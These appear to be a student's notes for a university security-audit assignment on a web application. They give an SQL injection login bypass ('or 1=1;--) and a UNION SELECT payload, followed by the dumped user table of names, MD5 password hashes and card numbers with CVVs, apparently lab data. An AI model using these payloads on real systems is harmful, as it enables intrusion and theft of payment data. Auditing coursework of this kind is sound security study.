GitHub/quartz
1
0
Fork 2
mirror of https://github.com/jackyzha0/quartz.git synced 2025-12-27 14:54:05 -06:00
Code Issues Actions Packages Projects Releases Wiki Activity
9468407312
quartz/content/notes/ass01-security-audit.md
Jet Hughes 9468407312 vault backup: 2022-09-08 10:23:15
2022-09-08 10:23:15 +12:00

12 KiB
Raw Blame History

title aliases tags
ass01-security-audit
assignment
comp210

Jet Hughes - 9474308

Summary of system

  • function
  • technology

Flaws

Password policy

  • must have at least 5 characters and one digit.
    • not suffiecient

SQL Injection

  • can log in to admin using username: " 'or 1=1;--"
  • we are able to extract data which is displayed as the users username
  • we can extract the data from the data base using this "username"
    • ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--

germane54:8642a2f37a5d42b54ce53b1fbdd1583f:Germane Combs:4539 8313 9207 6261:05/2021:201 odysseus33:bf9990695b6c6c88406557bc17a83f7c:Odysseus Wall:4716549153432:04/2021:703 florence59:37a7d989abe835f49b618a5f93a5ad4a:Florence Carroll:4279177472541:08/2021:251 garrett16:6b1d24ff83a319070db95c6c84b9be31:Garrett Haney:4539 9681 7009 9535:12/2020:514 uriah54:827ccb0eea8a706c4c34a16891f84e7b:Uriah Justice:4360669337267:10/2021:845 marsden06:4142047431f5f974ef182c6f3a4982f6:Marsden Singleton:4539240434236:10/2020:263 halla96:09c8662b68b05977c1017f69e000229a:Halla Burns:4556 9987 0557 8560:09/2021:196 ruby69:1043bfc77febe75fafec0c4309faccf1:Ruby Becker:4532599069950:09/2021:659 nathan45:43b90920409618f188bfc6923f16b9fa:Nathan Mayer:4532028287348:08/2020:704 chelsea01:a3731c83692fc0ed3cfa242588325f68:Chelsea Chapman:4562 5984 5330 0605:03/2022:171 leo65:5f4dcc3b5aa765d61d8327deb882cf99:Leo Montoya:4916660343578:05/2022:835 heather27:121327de482f191cd7e6c2e6f93a7c54:Heather Deleon:4916 4476 0819 0789:02/2022:831 sophia30:20f35e630daf44dbfa4c3f68f5399d8c:Sophia Payne:4485280624874:09/2021:968 wallace18:fcd0114d5ecb07c992f71a4ccfc05e0d:Wallace Hopper:4485398830017:04/2022:378 hiram10:9abcf93d8c1385269d31db0aa62dff78:Hiram Barker:4929 4127 4622 6510:02/2022:965 callum82:773273bc49832ad719c7d2bc6fe134ce:Callum Ashley:4024007115286:11/2020:683 sophia92:311d8e785a461af48b950ebf32fcede5:Sophia Robbins:4556325953336:12/2020:364 ria30:39b8de044724514cf85f72c4e0ab1727:Ria Cote:4916789627448:09/2021:691 jelani02:01300cf37916417513191761399ce300:Jelani Hickman:4929352763649:08/2020:731 alma28:3d1a5809feab9e8e733735c8f27bb7fb:Alma Watkins:4485880718407:06/2021:245 kenyon78:47ecddc07b7432c27dddc7fa9d9c323a:Kenyon Odom:4716 9939 7574 4684:11/2021:211 roanna30:7cf5d933dc9bf5a78610b07580083547:Roanna Sawyer:4556870451405:01/2021:178 joseph92:2ffff39706a5d7aaa0e054312d146502:Joseph Shepherd:4548 4001 9256 7371:02/2021:196 hiroko26:1efc31ea103ff300471203e34b6eba6d:Hiroko Cortez:4916478345146:10/2020:260 keith97:c9ee99a6a0ab1d30cfcf94fc7d1837d1:Keith Mullins:4539 5300 0593 9473:08/2020:728 graiden00:afeaaa8bb9df14ed37c771058d26a8f6:Graiden Cotton:4716 0062 5979 1311:04/2022:934 audrey05:300075145a408ad77a77787607923460:Audrey Reyes:4024 0071 3847 1296:09/2021:698 paki40:6e1a28d448dd48af66b33d139d17c77f:Paki Gates:4024 0071 6767 2848:05/2021:893 keaton72:842fdf6d6c9e4419ce01b5e3c6d2d6fa:Keaton Calhoun:4716 2433 4586 7637:10/2020:830 amos69:0c0cb34c4dbb20cc25ff1aaa7edad735:Amos Howe:4532321077800:06/2021:423 mona08:24ed42552ed68cccecfffdcc472b3528:Mona Hayes:4716 7491 2769 7000:05/2022:673 sonia44:5561deb211d409ff80f58b871bee51fd:Sonia Tyler:4024007165943:04/2021:373 mannix39:05eeca7541cf4b8ac022d67aa1175396:Mannix Wilson:4163872709409:12/2021:380 cedric25:3ef40b3b460422942f8099603064fe05:Cedric Brady:4716 6959 7443 5590:04/2021:794 kareem16:f34422bcdc47f03049914f8980595636:Kareem Gray:4485 7307 8274 1761:09/2020:263 fulton09:fc16f82baa7135b48134de398d72eefe:Fulton Levy:4916 7219 9226 0881:06/2021:756 coby83:1ab5ab5593eebd40643ea998675cc9f5:Coby Huber:4409135506045:02/2021:412 ira13:af7c7e061253c425804c08bd4f1ada98:Ira Moody:4539897958701:03/2021:399 hu19:40f96b6fdf6d30cebf684405a6f9b2dc:Hu England:4532 7877 3801 1734:06/2021:224 melodie88:69547acb697857925d686dc81eeaaaf7:Melodie Cannon:4916 9103 0121 1194:11/2021:170 brendan72:404e218d27fee49e22248925f3eecd06:Brendan Hamilton:4929 4017 6321 3287:09/2021:163 leandra80:d74827ee76d4e4213cc4aea063109265:Leandra Williamson:4539 5061 8481 1899:03/2022:370 maxine03:496b178966fd31a90acf9afe59767e93:Maxine Alvarado:4916474571547:05/2021:672 zorita47:248475c0f25c52d675b4221d45df91d5:Zorita Hayes:4539 8430 4908 2469:11/2020:144 desirae95:546ade640b6edfbc8a086ef31347e768:Desirae Guy:4539444149283:12/2021:579 zahir19:74e9af2246b7085ed082dae691a3bcaa:Zahir Zimmerman:4024007186105:09/2020:148 veronica10:2f49f4708537033e725213452617f2e4:Veronica Fisher:4916 4151 0150 5365:11/2020:659 amal97:7d8949bcbf85067fceda9f84a6affb6b:Amal Grant:4024 0071 2779 7065:08/2021:656 giacomo75:ebc7748dfc82aaa2b35b8d1cc3fdfe7e:Giacomo Jordan:4539 1001 9593 1563:03/2021:805 maisie81:df9b7588dcaf48db2f893f9d8d560c32:Maisie Noble:4664971186118:12/2020:629 demetria93:63ed7352db78081eb0608e413a50076e:Demetria Moon:4024007118652:06/2022:350 shelley61:3254cd378c7ede5e26cc74349d77e1c3:Shelley Dale:4556 2050 8311 6579:07/2021:637 kiara60:7566120cc98f85dba933e2538acd9885:Kiara Forbes:4485529549510:09/2021:190 nicholas82:4fe9cb131031fa6489723e3d49194f99:Nicholas Puckett:4024 0071 0111 0665:08/2021:976 william81:1569c256fba5413080c36dfdedbc15b8:William Bowman:4929043932041:03/2022:161 christine13:b1f2a00d90f420c1caee82db6f21b8c4:Christine Benton:4556954025620:08/2020:661 macon25:1b9ac7aecd52eab14089942f8267f22a:Macon Miles:4716834516178:07/2021:439 cally97:7d4e280a15b21987746a3f402f556d3d:Cally Wallace:4532191022035:05/2022:894 aidan19:7c6a180b36896a0a8c02787eeafb0e4c:Aidan Cohen:4716 5593 3836 5416:02/2022:227 igor11:b20ec38c09d59fe2bb72d64ffc08e090:Igor Chavez:4532 4822 6672 7725:06/2022:736 len96:a9a0198010a6073db96434f6cc5f22a8:Len Rosales:4556129729890:09/2021:880 bree11:884bdc78188426e07cf7cc03750052e8:Bree Maddox:4929 8840 2123 7653:01/2021:700 xyla99:3a2967f3d7e135a55d8bb158e61d95d4:Xyla Curry:4539109107352:05/2021:848 hoyt17:3a90eeb9b16640a98c41091237a517e3:Hoyt Meyer:4929 7101 6949 0186:11/2021:934 sheila93:aa252f7bcbb4b8379004aa0c7cf76c10:Sheila Black:4539 9343 7353 3878:04/2021:778 madison49:74bfd9ef311ff42cca44edfb24c3fced:Madison Ford:4929574862658:03/2021:330 ciaran63:0cd2269e449dec70464bd16e373fcfe5:Ciaran Barber:4539362378252:05/2022:350 karen45:8473f1455496d1922daaceebeb28c314:Karen Sears:4532 4415 2873 0190:09/2021:739 mallory20:d1fe449335c473c1ada95f16633d2f25:Mallory Dorsey:4929 9197 0065 4339:01/2022:470 shoshana04:6824cc4c7c33aabf02553093853c2e69:Shoshana Dillard:4929 3627 3332 1784:05/2022:942 ulysses46:78a0cc219a4cb3563ac5fed236ad00f9:Ulysses Gamble:4556 5426 7223 4995:08/2021:817 jasper96:28be4303152333e6c6e9a892f83c16b3:Jasper Dunn:4024007182880:01/2021:977 gabriel30:7b144da76ec35ea610fb70e1ddec381a:Gabriel Larson:4839 5815 7278 1084:12/2021:792 seth16:6b157916b43b09df5a22f658ccb92b64:Seth Monroe:4532556935904:12/2020:704 thomas41:8c1271eba12ac10910fc875200a612a8:Thomas Grant:4532 9082 4326 3798:12/2020:677 brenda48:eb2b0f82d5d1235eb5d5b8524ac3956e:Brenda Sexton:4532020010961:09/2021:816 isabella21:c3a6f631cc20ae5b86f21fc4afd76778:Isabella Maynard:4916 1242 3477 3151:06/2022:195 gannon54:7d4ef62de50874a4db33e6da3ff79f75:Gannon Mclean:4024 0071 8073 0367:04/2022:719 ursa20:a597a055c00d084069e4bb23dc789ac9:Ursa Bradley:4539794165509:12/2020:401 nayda99:ffe6b25297c719d2bdc912e8016bac1f:Nayda Snyder:4716485485996:01/2021:541 jeremy51:2c44f0e9e7639827e55611b9f10298e5:Jeremy Norris:4485689013885:05/2021:564 kamal18:474fbc006ea760334e3ea4cb02567085:Kamal Mclaughlin:4929 5514 0594 0273:02/2022:660 merrill61:09215b73e16ac95e82e707770e70ee2e:Merrill Herring:4916421632913:09/2021:204 gretchen42:deb24bd2ef3c4cff2b97fc8a0c332c61:Gretchen Mcpherson:4485 5812 9037 6693:04/2022:573 rafael75:eca3a940fa0f3c359c0fa06751dbed7e:Rafael Perkins:4716 9499 4584 4400:09/2021:463 harper35:b7f9b17685450972929169f39408eaab:Harper David:4070 4724 4725 3400:07/2021:143 merrill64:36d1b80f0a97b001b90333cd7c1ba23e:Merrill Dominguez:4929 4095 8016 5440:10/2021:914 kirk24:09d92722e3473cd81cb125ebdcd0f0c4:Kirk Williams:4929 5822 5223 6085:09/2020:198 selma65:dd0b08a63e33c7b28e7705c2eb166fa3:Selma Conway:4024007118504:08/2021:926 ebony87:01ed6efc5befa76539ebb2acccfad417:Ebony Shelton:4556836938891:01/2021:624 zephr92:cca293d8fb2ae0fae877947edf849302:Zephr Mendez:4024 0071 6842 0668:01/2022:389 clinton73:6a3128b20f46a466eb30f3f8aa409939:Clinton Olsen:4532988239578:06/2022:578 akeem39:db56d929f1d53f0fe6b3f3bf0fa584d2:Akeem Albert:4485 5857 9625 6317:07/2022:349 brandon07:6d0c1672e5ef4c344bdf0192fcfcc969:Brandon Huffman:4556551530683:11/2021:769 omar03:b4085d5a36185e96040db920502dc9d9:Omar Lynch:4809813647310:03/2022:434 russell96:2dc55352f315e7f15614a5706d173565:Russell Tran:4532369774425:01/2022:840 barrett44:34a9de4e129bac624ceb1e2dacb82f8b:Barrett Edwards:4539757109999:12/2021:254 brynne08:18eba0935722545cbaa0baffc799eee4:Brynne Mosley:4024007116094:08/2021:750 conan50:5173980c016c6799ec2bb87d32199f31:Conan Mcmillan:4556095296304:07/2022:841 jakeem55:fc341220efabc478401144667948e733:Jakeem Mason:4556562784204:12/2021:141 jlap:84c1a190e5c4586a62f5c7602d5a8160:Jet Hughes:1234 1234 1234 1234:04/34:123

Passwords: 8642a2f37a5d42b54ce53b1fbdd1583f bf9990695b6c6c88406557bc17a83f7c 37a7d989abe835f49b618a5f93a5ad4a 6b1d24ff83a319070db95c6c84b9be31 827ccb0eea8a706c4c34a16891f84e7b 4142047431f5f974ef182c6f3a4982f6 09c8662b68b05977c1017f69e000229a 1043bfc77febe75fafec0c4309faccf1 43b90920409618f188bfc6923f16b9fa a3731c83692fc0ed3cfa242588325f68 5f4dcc3b5aa765d61d8327deb882cf99 121327de482f191cd7e6c2e6f93a7c54 20f35e630daf44dbfa4c3f68f5399d8c fcd0114d5ecb07c992f71a4ccfc05e0d 9abcf93d8c1385269d31db0aa62dff78 773273bc49832ad719c7d2bc6fe134ce 311d8e785a461af48b950ebf32fcede5 39b8de044724514cf85f72c4e0ab1727 01300cf37916417513191761399ce300 3d1a5809feab9e8e733735c8f27bb7fb 47ecddc07b7432c27dddc7fa9d9c323a 7cf5d933dc9bf5a78610b07580083547 2ffff39706a5d7aaa0e054312d146502 1efc31ea103ff300471203e34b6eba6d c9ee99a6a0ab1d30cfcf94fc7d1837d1 afeaaa8bb9df14ed37c771058d26a8f6 300075145a408ad77a77787607923460 6e1a28d448dd48af66b33d139d17c77f 842fdf6d6c9e4419ce01b5e3c6d2d6fa 0c0cb34c4dbb20cc25ff1aaa7edad735 24ed42552ed68cccecfffdcc472b3528 5561deb211d409ff80f58b871bee51fd 05eeca7541cf4b8ac022d67aa1175396 3ef40b3b460422942f8099603064fe05 f34422bcdc47f03049914f8980595636 fc16f82baa7135b48134de398d72eefe 1ab5ab5593eebd40643ea998675cc9f5 af7c7e061253c425804c08bd4f1ada98 40f96b6fdf6d30cebf684405a6f9b2dc 69547acb697857925d686dc81eeaaaf7 404e218d27fee49e22248925f3eecd06 d74827ee76d4e4213cc4aea063109265 496b178966fd31a90acf9afe59767e93 248475c0f25c52d675b4221d45df91d5 546ade640b6edfbc8a086ef31347e768 74e9af2246b7085ed082dae691a3bcaa 2f49f4708537033e725213452617f2e4 7d8949bcbf85067fceda9f84a6affb6b ebc7748dfc82aaa2b35b8d1cc3fdfe7e df9b7588dcaf48db2f893f9d8d560c32 63ed7352db78081eb0608e413a50076e 3254cd378c7ede5e26cc74349d77e1c3 7566120cc98f85dba933e2a538acd9885 4fe9cb131031fa6489723e3d49194f99 1569c256fba5413080c36dfdedbc15b8 b1f2a00d90f420c1caee82db6f21b8c4 1b9ac7aecd52eab14089942f8267f22a 7d4e280a15b21987746a3f402f556d3d 7c6a180b36896a0a8c02787eeafb0e4c b20ec38c09d59fe2bb72d64ffc08e090 a9a0198010a6073db96434f6cc5f22a8 884bdc78188426e07cf7cc03750052e8 3a2967f3d7e135a55d8bb158e61d95d4 3a90eeb9b16640a98c41091237a517e3 aa252f7bcbb4b8379004aa0c7cf76c10 74bfd9ef311ff42cca44edfb24c3fced 0cd2269e449dec70464bd16e373fcfe5 8473f1455496d1922daaceebeb28c314 d1fe449335c473c1ada95f16633d2f25 6824cc4c7c33aabf02553093853c2e69 78a0cc219a4cb3563ac5fed236ad00f9 28be4303152333e6c6e9a892f83c16b3 7b144da76ec35ea610fb70e1ddec381a 6b157916b43b09df5a22f658ccb92b64 8c1271eba12ac10910fc875200a612a8 eb2b0f82d5d1235eb5d5b8524ac3956e c3a6f631cc20ae5b86f21fc4afd76778 7d4ef62de50874a4db33e6da3ff79f75 a597a055c00d084069e4bb23dc789ac9 ffe6b25297c719d2bdc912e8016bac1f 2c44f0e9e7639827e55611b9f10298e5 474fbc006ea760334e3ea4cb02567085 09215b73e16ac95e82e707770e70ee2e deb24bd2ef3c4cff2b97fc8a0c332c61 eca3a940fa0f3c359c0fa06751dbed7e b7f9b17685450972929169f39408eaab 36d1b80f0a97b001b90333cd7c1ba23e 09d92722e3473cd81cb125ebdcd0f0c4 dd0b08a63e33c7b28e7705c2eb166fa3 01ed6efc5befa76539ebb2acccfad417 cca293d8fb2ae0fae877947edf849302 6a3128b20f46a466eb30f3f8aa409939 db56d929f1d53f0fe6b3f3bf0fa584d2 6d0c1672e5ef4c344bdf0192fcfcc969 b4085d5a36185e96040db920502dc9d9 2dc55352f315e7f15614a5706d173565 34a9de4e129bac624ceb1e2dacb82f8b 18eba0935722545cbaa0baffc799eee4 5173980c016c6799ec2bb87d32199f31 fc341220efabc478401144667948e733 84c1a190e5c4586a62f5c7602d5a8160

Javascript Injection

Path traversal

Network-Level security

Other